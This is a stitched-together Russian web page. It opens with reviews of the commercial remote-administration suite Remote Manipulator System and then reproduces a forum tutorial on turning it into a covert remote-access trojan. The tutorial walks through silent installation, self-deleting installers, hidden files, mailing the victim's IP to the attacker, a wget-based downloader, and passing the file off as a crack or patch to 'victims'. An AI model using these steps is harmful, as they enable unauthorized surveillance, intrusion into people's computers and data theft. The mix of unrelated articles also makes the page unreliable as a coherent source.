Как работает rms. RMS - полностью скрытая установка и управление

Последние несколько лет программы для удаленного управления компьютерами все более обретают популярность, как для корпоративного использования, так и у домашних пользователей. Системный администратор даже малого предприятия уже не может представить себе жизнь без программы удаленного администрирования.

Что же такое программа для удаленного администрирования? Как следует из названия, в первую очередь это инструмент, позволяющий получить полный доступ к удаленному ПК на расстоянии. Программа перенаправляет на Ваш компьютер картинку с удаленного экрана и транслирует нажатия клавиш клавиатуры и перемещение курсора мыши с Вашего ПК на удаленный. Это базовая функциональность практически для всех решений в области удаленного администрирования. Но очень часто этого оказывается мало, требуются дополнительные функции. Именно наличие различного дополнительной функциональности и отличает друг от друга софт этой категории. В данном обзоре мы рассмотрим отечественную разработку компании «TektonIT» - продукт «Remote Manipulator System».

Remote Manipulator System состоит из двух частей. Серверная часть (RMan-Server) устанавливается на компьютеры пользователей, к которым нужно получить доступ. Клиентская часть (RMan-Viewer) устанавливается на компьютер администратора, с которого будет осуществляться удаленное управление.

Viewer - Server

Скачать дистрибутив можно с официального сайта компании производителя , размер дистрибутива около 10 МБ. Программа совместима с Windows 7.

Установка Remote Manipulator System

Подробно рассмотрим процесс установки серверной и клиентской части. Для программ удаленного администрирования установка - это важнейшая часть функциональности.

Для работы программы нужно установить два модуля. Модуль RMan-Viewer на компьютер администратора и модуль RMan-Server на компьютеры пользователей. Доступно несколько способов установки серверной части.

Первый способ - ручная установка сервера из MSI-дистрибутива. В процессе установки программа автоматически интегрируется в стандартный брандмауэр, чтобы не было проблем с доступом к серверу из внешней сети. Затем появится окно настроек программы, где необходимо задать пароль для доступа к данному компьютеру через клиентскую программу RMan-Viewer. Можно задать и другие дополнительные параметры безопасности, установить IP-фильтр, настроить доступ к определенным режимам соединения.

Второй способ - удаленная установка серверной части непосредственно с рабочего места администратора. К слову, доступно несколько видов удаленной установки - это установка с помощью встроенной специализированной утилиты и автоматизированная удаленная установка в домене через групповые политики безопасности Active Directory. Последний вариант особенно удобен для организаций с крупным парком ПК.

Для начала, нужно установить RMan-Viewer - клиентский модуль, позволяющий осуществлять контроль над серверными модулями.


Главное окно RMan-Viewer

В список соединений нужно добавить новое соединение, указав в его настройках IP-адрес или имя удаленного компьютера.


Новое соединение

Для массового добавления RMan-Server-ов в список соединений можно воспользоваться встроенным поиском.


Поиск RMan-Server-ов

Выберите в списке соединений интересующее, либо группу интересующих компьютеров и через контекстное меню запустите утилиту «Удаленная установка».


Удаленная установка

В этом окне нужно указать MSI дистрибутив RMan-Server, который требуется установить. Также, указав путь к дистрибутиву, запускаем MSI-конфигуратор, с помощью которого можно легко предварительно настроить дистрибутив устанавливаемого сервера, например, задать пароль доступа.


MSI-конфигуратор

С помощью встроенной утилиты удаленной установки можно не только инсталлировать Remote Manipulator на удаленный компьютер, но и деинсталлировать его, запускать и останавливать.

Функциональность

Программа предоставляет весьма широкий выбор режимов соединения.

  • Удаленное управление компьютером.
  • Удаленное наблюдение.
  • Файловый менеджер.
  • Удаленный диспетчер задач.
  • Удаленный диспетчер устройств.
  • Удаленный реестр.
  • Терминал - доступ к командной строке (аналог системной утилиты «Командная строка»).
  • Управление питанием.
  • Удаленный запуск программ.
  • Текстовый чат.
  • Подключение к удаленной web-камере и микрофону.
  • Отправка простого текстового сообщения.
  • Соединение по протоколу RDP.
  • Запись рабочего стола сервера по расписанию.

Основной плюс, проистекающий из такого обилия вариантов подключения, - возможность производить различные настройки, не отвлекая пользователя от работы. Например, можно редактировать реестр или просматривать список установленного оборудования и программ, но на экране сервера не будет происходить совершенно никаких изменений.

Остановимся на рассмотрении некоторых режимов подробнее.

Удаленное наблюдение и управление

Данный режим является наиболее востребованным и часто используемым. Этот режим позволяет подключиться к удаленному компьютеру и управлять им, как если бы Вы сидели непосредственно перед его экраном. Субъективно продукт показал достаточно высокую скорость работы в локальной сети - разработчики не преувеличили, приведя в описании продукта фразу «Скорость работы на таком уровне, что Вы не почувствуете разницу между локальным и удаленным компьютером».


Удаленный рабочий стол

Вверху окна с удаленным экраном находится всплывающая панель инструментов, с набором наиболее часто используемых функций.

Панель инструментов

Можно заблокировать устройства ввода и экран удаленного компьютера, чтобы пользователь не видел манипуляции, производимые во время сеанса управления; выбрать монитор (если их несколько на удаленной машине); переносить информацию через буфер обмена.

Также, непосредственно в окне с удаленным экраном, можно открыть панель расширенной настройки.




Дополнительные параметры

Файловый менеджер

Весьма часто возникает необходимость передать файл с одного компьютера на другой, а стандартный общий доступ к интересующим файлам не настроен, либо не доступен. На помощь приходит модуль передачи файлов.


Файловый менеджер

Интерфейс этого модуля напоминает известный файловый менеджер «Total Commander», поэтому большинству опытных пользователей разобраться с данным модулем не составит труда. Доступны все распространенные файловые операции. Файлы можно копировать, перемещать, удалять, переименовывать.

Файловый менеджер полностью поддерживает операции перетаскивания «Drag&Drop», совместим с системным проводником. Есть удобная система закладок для быстрого перехода по наиболее часто используемым директориям.

Многим будет полезна функция т. н. докачки файлов.

Удаленная веб-камера

Этот модуль появился в продукте недавно и практически не имеет аналогов среди программ для удаленного доступа. Этот режим позволяет подключаться к устройствам видео захвата (веб-камера, микрофон, TV-тюнер и т. д.). Т. о. Remote Manipulator позволяет наблюдать не только за тем, что происходит на экране удаленного компьютера, но и за тем, что происходит возле него.


Удаленная веб-камера

Данный режим имеет ряд настроек, позволяющих выбрать нужное устройство захвата и качество картинки.


Настройка удаленной веб-камеры

Во время сеанса подключения к веб-камере на удаленном компьютере отображается баннер, оповещающий пользователя о том, что за ним ведется видеонаблюдение. Всё-таки Remote Manipulator это софт для администрирования, а не для шпионажа.

Диспетчер задач

Данный режим предназначен для управления окнами, процессами и службами удаленного ПК. Проще говоря, если нужно запустить какую-то службу или завершить не желательный процесс - удаленный диспетчер задач подойдет как нельзя кстати.


Диспетчер задач

Текстовый чат и отправка простого текстового сообщения

Не забыты в программе и средства коммуникации с удаленными пользователями.

Многопользовательский чат с возможностью расширенного форматирования текста и отправкой вложений.


Текстовый чат

И отправка простого текстового сообщения.


Простое сообщение

Инвентаризация

Режим «Удаленный диспетчер устройств» реализует функциональность, позволяющую производить полную перепись программного и аппаратного обеспечения парка машин. Информация группируется в удобные HTML- или XML-отчеты.


Диспетчер устройств

Удаленный редактор реестра

Довольно новый режим, хотя давно имеется у некоторых аналогов. Незаменим, когда нужно поправить что-то в удаленном системном реестре, но не хочется отвлекать пользователя.


Удаленный редактор реестра

Интерфейс очень похож на системный Regedit, поэтому разобраться в этом модуле можно мгновенно. К слову, редакторы параметров тоже сделаны на должном уровне.

Удобной особенностью является наличие функции импорта/экспорта ключей и параметров в стандартный файл.REG.

Другие режимы

Режим «Запись экрана» позволяет следить за действиями пользователя полностью автономно от RMan-Viewer. Т. е. администратор, с помощью удобного пользовательского интерфейса, может задать расписание, которое, если перевести на человеческий язык, выглядит так - «Делать снимок каждые 2 минуты, по рабочим дням с 8 утра до 5 вечера». В любой момент администратор может загрузить с сервера файл, в котором хранятся снимки экрана за какой-то конкретный день и посмотреть, с помощью специального плеера, что происходило на экране удаленного компьютера, к примеру, в 16:00. Имеется возможность защиты файлов с записями от удаления на сервере.

Итак, кому может понадобиться это? В первую очередь, администраторам и руководителям, так как это дает возможность контролировать работу самих пользователей, просмотрев дневной отчет с кадрами раз в 1 минуту, можно получить точную картину того, что происходило на экране удаленного компьютера на протяжении всего рабочего дня. Таким образом, можно серьезно оптимизировать работу сотрудников, даже когда администратора нет на рабочем месте.

Режим «Терминал» позволяет получить полноценный доступ к командной строке удаленной системы. Ввод команд и запуск программ в окне «Терминал» производится точно так же, как в командной строке системной утилиты «cmd». Кстати, в отличие от некоторых других программ, в RMan данный режим полностью совместим с кириллицей.

Есть встроенный RDP-клиент. RDP - утилита для управления рабочим столом удаленного компьютера. Используется стандартный протокол удаленного рабочего стола, разработанный компанией «Microsoft».

Режим «Управление питанием» позволяет выключать и перезагружать удаленный компьютер, завершать и блокировать сеанс текущего пользователя удаленно.

Безопасность

По заверению разработчиков, Remote Manipulator System спроектирован с учетом современных стандартов и требований безопасности на всех уровнях. Все данные, передаваемые по сети, шифруются, эту функцию нельзя отключить. Для аутентификации клиента используется алгоритм шифрования открытым ключом RSA с длиной ключа 2048 бит. Передаваемые данные шифруются надежным AES алгоритмом с 256-битным ключом. Есть возможность настраивать алгоритмы шифрования и длину ключа. Все криптографические функции реализованы в сертифицированных системных библиотеках «Microsoft».

RMan поддерживает две системы авторизации: защита паролем и защита на базе Active Directory. Настройки RMan-Server хранятся в системном реестре Windows, доступ к ним ограничен всем, кроме пользователей с правами администратора. Так же есть возможность поставить пароль на доступ к настройкам сервера даже для администраторов.

Имеется довольно гибкая система разграничения сетевого доступа к серверу: привязка к одному конкретному сетевому интерфейсу, запрет доступа по IP-адресу или диапазону IP-адресов, защита от подбора пароля и DoS-атак.


IP-фильтр

Работа через NAT и в сложной топологии сети

Функция «Обратное соединение» (callback) позволяет серверу выступать инициатором сетевого соединения. Благодаря этому механизму можно осуществлять соединение даже с сервером, который находится за сетевым экраном или же если не известен его IP-адрес.


Обратное соединение

Функция «Соединение через…» дает возможность соединяться через цепочку RMan-Server-ов (выстраивать т. н. каскадное соединение), в случае, если нет маршрутизируемого доступа в нужную подсеть напрямую.


Каскадное соединение

Некоторая дополнительная функциональность

Если описывать каждую функцию каждого режима программы, то это будет уже не формат обзора, а формат небольшой книги. Поэтому просто коротко перечислим список некоторых востребованных дополнительных функций программы.

  • Повсеместная интеграция с технологией «Drag&Drop» (перетащи и брось). Файлы и папки можно перетаскивать привычным для Windows способом - непосредственно на окно с удаленным рабочим столом и наоборот.
  • Поддержка мультимониторных систем.
  • Трансляция звука с удаленной машины на локальную.
  • Можно включить блокировку экрана и клавиатуры удаленного компьютера во время сеанса администрирования.
  • Полная поддержка графической оболочки «Aero». При соединении оболочка не отключается, хотя имеется настройка, позволяющая её отключить.
  • Возможность прикреплять файлы к сообщениям в текстовом чате.
  • «Интеллектуальная докачка» файлов через файловый менеджер.
  • «Wake-On-LAN» - удаленное включение компьютера.
  • Карта сети. Список соединений можно просматривать в виде карты топологии сети.
  • Защита настроек RMan-Server-а паролем.
  • Система журналирования событий на сервере.

Итоги

Продукт, безусловно, достоин внимания и подойдет самым различным категориям пользователей. Я бы особо выделил действительно высокую скорость передачи картинки в режиме удаленного управления, неконфликтность с драйверами устройств, широкую функциональность, высокую динамику развития программы и внедрения новых функций.

RMS Удаленный доступ (Remote Manipulator System) - это программа, предназначенная для системных администраторов небольших предприятий, а также специалистов, осуществляющих техническую поддержку пользователей. С ее помощью можно наладить удаленный доступ к нескольким компьютерам и работать с ними параллельно. Данное решение состоит из двух частей - клиента и хост. Первая устанавливается на компьютер администратора, а вторая - на компьютер пользователя. При корректном функционировании программы, клиентская часть дает возможность управлять запущенными программами, работать с файловой системой, командной строкой, диспетчером задач, периферийными устройствами и так далее. Она имеет очень простой понятный интерфейс и богатое окно настроек.

При создании RMS Удаленный доступ разработчики уделили особое внимание безопасности использования программы. Соединение, установленное между клиентом и хостом, надежно защищено и шифруется несколькими способами.

Ключевые особенности и функции

  • состоит из хоста и клиентской части;
  • позволяет получить полный контроль над удаленным компьютером;
  • обеспечивает надежную защиту установленного соединения;
  • включает в себя конфигуратор MSI дистрибутива;
  • имеет удобный пользовательский интерфейс.
RMS Удаленный доступ — это продукт для управления удаленным рабочим столом, предоставляющий простой и безопасный доступ к PC в любой точке земного шара. RMS позволяет просматривать удаленный экран и управлять клавиатурой и мышью так, как будто удаленный компьютер находится непосредственно перед вами. RMS состоит из двух основных модулей:

Модуль управления — Клиент

Модуль « » предназначен для подсоединения к удаленным рабочим станциям, на которых установлен Хост. Клиент предоставляет удобный UI для управления списком соединений, построения карты сети, поиска удаленных рабочих станций и управления ими в различных режимах.

Удаленный модуль — Хост

« » должен быть установлен на каждой удаленной рабочей станции, к которой нужно получить доступ. Этот модуль позволяет удаленно управлять компьютером, на котором он установлен. Возможна удаленная установка клиентских модулей, также имеется конфигуратор MSI дистрибутива Хоста.
Из единого центра управления вы можете подключиться к любому компьютеру в домене — через Active Directory, в локальной сети или же через интернет — при помощи Internet-ID. Также имеются вспомогательные модули:

Клиент (Viewer) — это приложение, используемое техническими специалистами или администраторами для установки сеанса удаленного доступа. Viewer позволяет управлять списком удаленных компьютеров и устанавливать с ними соединение в любом из 15 доступных режимов.


Главное окно модуля Клиент

Хост необходимо устанавливать на каждый удаленный компьютер (возможна удаленная и автоматизированная массовая установка). Он более универсален, чем Агент (см. ниже), и обеспечивает как контролируемый удаленный доступ , так и не контролируемый (т.е. доступ, не требующий присутствия человека за удаленным компьютером). Т.к. Host работает как системная служба, вы можете совершать любые действия с удаленным ПК без каких-либо дополнительных настроек, достаточно просто того, чтобы компьютер был включен и в сети.

Значок Хоста в области уведомлений

Однако же, не смотря на то, что Host обеспечивает неконтролируемый доступ, есть возможность ограничить права доступа по режимам и настроить программу таким образом, чтобы при попытке удаленного соединения, удаленный пользователь должен был дать разрешение на доступ со стороны администратора. Хост удобен, прежде всего, организациям с большим парком ПК и пользователям, которым нужен максимально возможный контроль над удаленными компьютерами.

Агент

Агент — это, по своей сути, облегченная версия модуля Хост. Данное приложение не требует установки и даже прав администратора на удаленном компьютере. Удаленный клиент просто скачивает данное приложение, запускает его и говорит техническому специалисту службы поддержки ID и пароль, которые отображаются на весьма простом окне программы.


Агент можно, специальным образом, заранее настроить, разместив там логотип вашей компании и указав нужный текст приглашения. Вы можете отправить клиенту ссылку на специально сконфигурированный Агент, размещенный на вашем сайте. Еще одна удобная особенность, которую можно заранее сконфигурировать — автоматическая отправка атрибутов доступа на ваш email сразу после запуска Агента. Таким образом, удаленному клиенту даже не придется сообщать вам ID и пароль доступа — они придут вам на почту автоматически. Удаленный клиент может в любой момент прекратить сеанс удаленного доступа, просто закрыв приложение Агент. Если требуется постоянный удаленный доступ в режиме 24/7, лучше использовать модуль Хост (Host). Агент будет полезен, прежде всего, для компаний, осуществляющий техническую поддержку своих пользователей через интернет.

Mini Internet-ID сервер

Mini Internet-ID сервер — это бесплатный, специализированный продукт, который будет интересен, прежде всего, продвинутым системным администраторам и компаниям, осуществляющим техническую поддержку через интернет. Mini Internet-ID сервер повторяет функциональность нашей глобальной системы Internet-ID, предназначенной для работы удаленного доступа по ID, через NAT и сетевые экраны. Данный сервер можно установить на любом компьютере, имеющим внешний IP адрес и настроить Host и Viewer таким образом, чтобы при соединении они использовали не нашу глобальную Internet-ID службу, а ваш выделенный Mini Internet-ID сервер. Это приложение устанавливается в виде службы и не требует больших ресурсов памяти или CPU.

Системные требования

Ни один модуль RMS не имеет каких-либо специальных требования к аппаратному и программному обеспечению.
Поддерживаются ОС семейства MS Windows 10 /8/7/Vista/XP и Windows Server 2016 /2012/2008/2003, включая 64x .

13 сентября 2013, Однокрылов Владимир 2

Сегодня мы протестируем решение для управления удалённым рабочим столом Remote Manipulator System 5.5. Комплект состоит из нескольких утилит, включая модули "Клиент" и "Хост". С их помощью можно наладить соединение с удалённым компьютером и дистанционно управлять работой всех его функций. Вдобавок к этому в RMS 5.5 есть чат, видеосвязь, возможность редактировать реестр и многое другое. Подробности читайте в нашем обзоре.

Видеообзор Remote Manipulator System 5.5

Состав программного комплекса Remote Manipulator System 5.5

С развитием Интернета, локальных ЛВС и повышением скорости соединений всё чаще требуется обращаться к удалённым компьютерам - неважно, системный ли вы администратор в компании с крупным парком ПК, или просто хотите помочь другу, живущему на другом конце города. В любом случае, программы управления удаленными рабочими столами не теряют популярности, а их разработчики всё расширяют функционал. И сегодня мы рассмотрим одно из таких решений - версии 5.5 на момент тестирования.

Изображение коробки RMS 5.5

В состав этого программного пакета входят следующие модули:

  • RMS Хост - после установки на удаленном хосте позволяет подключаться к нему для управления и настройки. Сервер не имеет никаких активных окон, кроме меню параметров.
Настройка RMS Хост 5.5
  • RMS Клиент - программа для подключения к RMS Хост .
Интерфейс RMS Клиент 5.5
  • RMS Агент - пакет RMS, не требующий установки и прав администратора для запуска. Программа сразу подключается к серверам для генерации ID и пароля, выводя соответствующее окошко, а в остальном мало чем отличается от стандартного хоста.
Стартовое окно RMS Агент 5.5
  • Mini Internet-ID сервер - сервер, который размещается локально и позволяет использовать Internet-ID без обращения к серверам TektonIT.
Информация о RMS Mini Internet-ID 5.5

Дополнительно доступен в клиенте программы так называемый MSI Конфигуратор - это пошаговый мастер по созданию трёх видов дистрибутивов (обычный MSI-пакет, дистрибутив автоматической установки и RMS-Агент ) из пакета RMS Хост , загружаемого с официального сайта.

Выбор типа дистрибутива в MSI Конфигуратор от RMS 5.5

Выбрав тип пакета, можно задать дополнительные опции - даже есть возможность отправить email-сообщение с ID установленного клиента.

Настройки дистрибутивов в RMS 5.5

Если какое-то из обязательных полей не заполнено, мастер вернёт вас на нужный шаг, а после пакет будет сформирован и можно будет выбрать место его сохранения.

Выбор места сохранения модифицированного дистрибутива RMS 5.5

В общем-то, удобно, особенно если нужно работать с несколькими компьютерами и не на всех у пользователя есть полноценные права доступа. К тому же в RMS Агент можно с помощью MSI Конфигуратор внести логотип и название своей компании.

Впечатления от работы с Remote Manipulator System 5.5

По сути, данное ПО работает по принципу "сервер-клиент", как и множество других подобных программ, и справляется с этим довольно хорошо. Позволяется не только подключаться и управлять компьютером/наблюдать за действиями пользователя, но также использовать множество полезных инструментов:

  • Передача файлов . Достигается это при помощи сдвоенного окна файлового менеджера, в котором можно копировать данные как на хост, так и на свой компьютер.
Передача файлов в RMS 5.5
  • Управление электропитанием . По сути, вы получаете доступ к возможностям выключения и перезагрузки ПК, включая функционал Wake on LAN.
Управление электропитанием в RMS 5.5
  • Диспетчер задач - мониторинг и управление процессами на удалённом ПК в реальном времени.
Диспетчер задач в RMS 5.5
  • Терминал - простой терминал для командной строки ОС на управляемом компьютере.
Терминал в RMS 5.5
  • Запуск программ позволяет открывать исполняемые файлы и документы от имени определённой учетной записи, в том числе и незаметно для пользователя.
Запуск программ в RMS 5.5
  • Инвентаризация - доступ к сведениям о системе.
Инвентаризация в RMS 5.5
  • RDP - подключение к удалённому ПК по протоколу Microsoft RDP.
  • Чат - минималистский текстовый мессенджер для общения с пользователями подключённых компьютеров.
Чат в RMS 5.5
  • Запись экрана - журнал видеозахватов экрана.
Журнал записей экрана в RMS 5.5
  • Сообщение . Эта опция позволяет выводить заданное сообщение на удаленном ПК в отдельном окне - например, можно оповестить пользователя о технических работах.
Создание сообщения в RMS 5.5
  • Удалённая камера позволяет получать видеопоток с удаленного ПК, причём несмотря на специализацию по камерам, в настройках можно выбрать любое доступное на удаленном компьютере устройство захвата.
Настройки удалённой камеры в RMS 5.5
  • Удалённый реестр . Редактор реестра удалённого ПК является крайне полезным инструментом для системного администратора.
Удалённый реестр в RMS 5.5
  • Аудио и видеочат позволяет, как и "Чат", общаться с пользователем удалённого ПК, только на этот раз используя микрофон и/или веб-камеру. Правда, другие устройства захвата модуль тоже видит, поэтому для нормальной работы всегда стоит в настройках выбрать сами веб-камеры.
Запуск аудио/видеочата в RMS 5.5

Что касается функционала, предназначенного именно для управления, то он выражен специальной панелькой вверху операционного окна, которая показывается при наведении на полоску курсора мыши. Отдельно стоить отметить опцию отключения экрана и возможность запретить ввод самому пользователю удалённого компьютера - это избавляет оператора техподдержки от борьбы за мышку или просто от любопытных глаз, если нужно настроить ПК в отсутствие пользователя. Для человека "на том конце провода" это выражается в том, что экран просто-напросто заливается сплошным белым фоном, а компьютер не реагирует на нажатия клавиш и действия мышью.

Окно управления ПК в RMS 5.5 Панель функций сеанса удаленного управления RMS 5.5

Не оставили без внимания и само соединение - для каждого сохраненного подключения можно задать множество параметров, включая оптимизацию под скорость сетевого соединения или, например, параметры цветности для удалённого экрана. Есть и такая интересная функция, как соединение через хост: можно указать в качестве промежуточного узла хост, к которому вы подсоединены, и с его помощью получить доступ к RMS-хостам в его локальной сети. Это позволяет настраивать компьютеры в сетях с ограниченным доступом в Интернет.

Настройки подключения в RMS 5.5

Даже для Microsoft RDP отведены отдельные наборы настроек - к слову сказать, они соответствуют стандартным, так что проблем совместимости RMS с другими хостами RDP не будет.

Настройки RDP-подключений в RMS 5.5

Есть и такая полезная возможность, как удалённая настройка RMS Хоста - вы просто выбираете эту опцию, ждёте около 5-10 секунд, а потом можете свободно менять настройки модуля RMS Хост на подключённом ПК.

Соединение для удалённой настройки хоста RMS 5.5 Настройки удалённого хоста RMS 5.5

Предусмотрен и режим передачи лицензий - можно при помощи клиента отправить удалённому RMS Хосту копию своего ключа, ввести новый ключ или вообще отозвать уже имеющуюся лицензию.

Выбор передаваемой лицензии в RMS 5.5

Общие настройки RMS Клиента кратки, но ёмки - на девяти вкладках собраны строго структурированные опции функционирования клиентского модуля.

Недавно у меня появилась навязчивая идея попробовать сделать свою сборку RMS с полностью скрытой установкой и дальнейшим скрытым управлением.
В инете много противоречивых отзывов по поводу этого - одни пишут о бессмысленности ввиду большого многообразия альтернативных методов (кейлогеров, стиллеров и т.д.), другие, наоборот, представляют данный метод, как отличный вариант скрытого удаленного многофункционального управления. Кто-то на этом зарабатывает, продавая сборки RMS. Между конкурентами даже разворачиваются разборки с последующей деанонимизацией. Так, например, предлагающий свои услуги LiteDem0 оказался: А vinject - автор этой темы:

Спойлер

Скрытый RMS [удаленное администрирование]


Всем доброго времени суток!

Сегодня мы с вами будем делать скрытую сборку Remote Manipulator System (аналог Radmin, Teamviewer)
Сразу предупреждаю, что собрать довольно сложно, особенно новичкам.

Видео-презентация как работает скрытый RMS :
Просмотр на YouTube



Я постараюсь объяснять все пошагово и доступным языком.
RMS (как и Radmin, TeamViewer и т.д.) выполняет одну и ту же функцию – удалённое администрирование (т.е. управление) компьютером

Что же умеет RMS?
Тут перечислены все его функции:
-Управление и наблюдение
-Файловый менеджер
-Текстовый чат
-Диспетчер задач
-Подключение посредством Internet-ID! (так же как у TeamViewer)
-Диспетчер устройств
-Подключение к командной строке
-Запись экрана по расписанию
-Простое текстовое сообщение
-Поддержка нескольких мониторов
-Удаленная установка
-Wake-On-Lan
-Удаленный реестр.
-Функция «Выполнить»
-Подключение к web-камере.
-Самоудаление
-Интеграция с фаерволлом

Начну с перечисления того, что собой представляет сборка:
1. Полностью скрытая установка (экран не моргает в отличии от Радмина)
2. После запуска установщик самоудаляется
3. Все файлы сборки скрыты/системны, жертве будет сложнее что-то заметить
4. Вам на почту дополнительно отправляется IP, но он нам не понадобится, скорее всего, так как мы будем использовать Internet-ID
5. Вес будет ~2,8мб
6. Данная сборка частично палится антивирусами (как сделать, что бы не палилась - пишите в контакты)

Итак, начнем собирать:

I. Настройка RMS сервера

Первым делом, скачиваем архив
Внимание! На архив стоит пароль

Пароль на архив:
-
Открываем папку R, запускаем файл server.exe, устанавливаем. По завершении установки, программа запустится сама:

Перед нами появляется окошко Безопасности:

Нажимаем Сменить/Установить – вводим пароль, допустим 12345678rms
Переходим во вкладку Аутентификация, стоять должна галочка – Уровень 3
Далее, нажимаем ОК! Все, окошко исчезает.

Следующим шагом для нас будет настройка сервера
В правом нижнем углу кликаем правой кнопкой по синему значку
Настройка Internet-ID соединения
Нажимаем Получить новый ID, появляется что-то похожее:

Следующим шагом для нас будет вторая часть настройки сервера:
открываем Пуск, Программы, Remote Manipulator System – Server, Settings for R-Server

Тут будет два шага, первый мы уже прошли («безопасность»).
2. Режим Запуска – Автоматический
3. Настройки, убрать все галочки, поставить только на "запретить закрытие RMS", также во вкладке Логирование галочка должна быть снята.
4. Лицензионный ключ – введите этот:
-

5. Закрываем Настройки

Открываем директорию, куда установился сервер, и выделяем следующие файлы:

Копируем, создаем где-нибудь папку, туда все вставляем.
Именно в этой папке у нас будет происходить все самое интересное, далее я эту папку буду называть “Новая Папка”

Продолжаем работать. Теперь нам надо экспортировать наши настройки с паролями и всеми настройками.

Для этого нам нужно сделать следующее:

Для ХР, WIN+R: regedit
Для 7, просто в строке «найти программы и файлы» вводим regedit, и Ок
Идем сюда: HKEY_LOCAL_MACHINE/SYSTEM/ далее экспортируем Remote Manipulator System

И указываем путь нашу созданную папку, (имя файлу задайте - sets) в которую мы копировали наши файлы сервера, вот что у Вас должно получиться:

Сам по себе файл sets.reg – это файл настроек, там хранятся все Ваши настройки, если Вы хотите что-то изменить, Вам нужно заменять только этот файл, проделав все предыдущие шаги.

II. Редактирование установщика

Ну вот, перешли к главной части.

Выделяем install.bat, правой кнопкой - изменить
(первая половина кода служит для того, чтоб на компе жертвы удалить ранее установленный Радмин, Rem_Cam, и если стоял ранее то и RMS, нам ведь не надо чтоб кто-то тоже имел доступ к компьютеру кроме нас).

Тут два простых шага:
1. Создаем почту на Яндексе(!):
2. Пожалуйста, здесь не тупите, чтоб не было потом вопросов!
Находим это почти в самом конце и редактируем вот это под себя:

###LOGIN### - это ТОЛЬКО логин, БЕЗ добавления @yandex.ru, ###PASSWORD### - 12345678, тут ясно -указываем свои данные с регистрации в Яндексе.
Закрываем, сохраняем.

Выделяем в Новой Папке файл setup.exe, правой кнопкой -открыть архив.
Выделяем все что есть в Новой Папке (кроме setup.exe разумеется) и перетягиваем в то открывшееся окошко. Успешно добавили файлы в архив.

В итоге у Вас должно выйти вот это:

Копируем куда-нибудь наш файл setup.exe.
Все остальное можете удалить из папки.

III. Завершение

Итак, открываем папку R, устанавливаем файл Viewer.exe, через него мы будем подключаться к «жертве» по Internet-ID.

Важно!
Если Вы собираетесь свою сборку кидать нескольким «жертвам» и сразу, то с Интернет-ИД будут проблемы, так как он присваивается одной сборке для одного компьютера.
Если Вы собираетесь распространять скрытый rms массово, то в таком случае нужно к каждой «жертве» подключаться по IP

Как я лично советую использовать данную сборку.
Вы кидаете её какой-нибудь одной жертве, она его устанавливает. Далее Вы можете по тому Internet-ID (который вы выше копировали) подключаться. Сделали всё что Вам нужно на компьютере жертвы и дальше удаляете сборку с компьютера жертвы
Для этого нужно:
Подключаетесь к жертве и выбираете подключение «Запуск программ»-Обзор - у жертвы заходите в директорию windows\system32 там находите файл de.exe, выбираете.(поставьте галочку «скрытый запуск»)

Файл de.exe входит в состав сборки. Это самоудаляющийся файл, который полностью удаляет с компа жертвы вашу сборку скрытого рмс

После запуска этого файла у жертвы лучше проверить удалилась ли сборка (для этого просто пытаемся подключиться снова), если не можем, это означает сборка успешно удалилась и мы можем использовать нашу сборку на другой жертве точно также как и на первой.
Это делается для того чтобы не было конфликтов между двумя компьютерами с одним Internet-ID.

Большим преимуществом данной сборки будет то что подключение будет стопроцентным! Даже если жертва имеет динамический IP (или за NAT"ом).

Также данная сборка интегрируется с фаерволом. В настройках можно включить экономию трафика, в этом случае все работать будет пошустрее и меньше трафика ест.
Еще не меньше порадовало наличие встроенного сканера серверов RMS. Если вы вдруг потеряли свою жертву с динамическим IP, Вы можете её легко найти, просканировав диапазон IP в котором она находится (например 92.72.0.0-92.72.255.255)

В общем – пробуйте, пишите отзывы, бросайте СПАСИБО

По желанию, создание даунлоадера

Что из себя, собственно, представляет данный даунлоадер и для чего он нужен?
Это.exe файл, который сразу после запуска самоудаляется, скачивает файл и устанавливает, после запуска самоудаляется, не оставив при этом никаких следов

Итак, начнем!

Все что нужно, находится в папке Downloader

Итак, нам нужна регистрация сервера на Яндексе.
У Вас уже должна быть почта на Яндексе, куда приходят IP. С этого аккаунта мы зарегистрируем наш сервер, куда будем заливать нашу сборку.

Для этого:
1. Зайдите на свой аккаунт на Яндексе
2. Переходим по ссылке http://narоd.yаndеx.ru/
3. Нажимаем «Создать сайт» (сайт нам не нужен, только файл-менеджер)
4. Когда наш сайт создан заходим в файл-менеджер, ****.narod2.yandex.ru/filemanager/
5. Выбираем «Загрузить файл», загружем нашу RMS сборку
6. После того как загрузится файл, там должна быть такая серенькая кнопочка «ссылка», нажимаем, копируем.

Допустим, у нас уже есть сервер на Яндексе, на котором лежит наш файл. Отлично, идем дальше.
Далее распаковываем наш скаченный архив, открываем папку link, файл winupd.bat – изменить.
###LINK### - адрес на файл
###DOWNLOADED"FILENAME### - название файла

Batch file: открываем наш батник - winupd.bat
Save us: оставляем как есть
Остальное ставим как на картинке, должно получится вот так:
Вкладка Options:

Во вкладке Include добавляем файл wget.exe
Вкладка Include:

Следующим шагом для нас будет помещение файла winupd.exe в оболочку, которая его будет дроппать и после этого самоудалятся.
Клик по файлу load.exe, открыть архив, перетягиваем файл winupd.exe в файл load.exe

Всё! Наш даунлоадер готов!

Для непалевности и удобства, можно впарить кому-то наш файл под видом кряка, патча, картинки и пр. (сразу говорю, невозможно создать установщик с расширением.jpg, .mp3, разве что перед этим покопавшись в реестре жертвы, ну это бред, лучше использовать СИ)

Изменения в Express RMS:

Упрощена настройка (логин и пароль вводите в текстовике)
- После перезагрузки повторно отправляет IP
- В установщике теперь всего 6 файлов:
- Установка проходит гораздо быстрее

Прошу не обращаться в личку с просьбой дать ключ на котором ограничения, по всем вопросам, а также Новым версиям сборок пишите мне на контакты (внизу)

Перезалитый архив

Просмотр на YouTube новой версии сборки

По любым вопросам/консультациям/обучению обращайтесь:
mail: [email protected]

Skype: vinject